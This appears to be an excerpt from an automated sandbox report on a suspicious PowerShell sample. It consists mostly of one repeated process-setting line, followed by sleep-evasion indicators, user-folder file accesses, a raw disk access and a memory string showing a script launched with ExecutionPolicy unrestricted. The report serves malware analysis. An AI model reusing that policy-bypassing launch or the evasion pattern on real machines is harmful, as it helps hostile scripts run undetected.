      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4172Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5541Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6483Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3148Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3604Thread sleep time: -12912720851596678s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4928Thread sleep count: 6483 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7156Thread sleep count: 3148 > 30Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2748Thread sleep time: -6456360425798339s >= -30000sJump to behavior
      Source: C:\Windows\System32\svchost.exe TID: 936Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: powershell.exe, 00000000.00000002.2421070129.000001E9C7C44000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe-noLogo-ExecutionPolicyunrestricted-fileC:\Users\user\Desktop\raEyjKggAf.ps132\Wbem;C
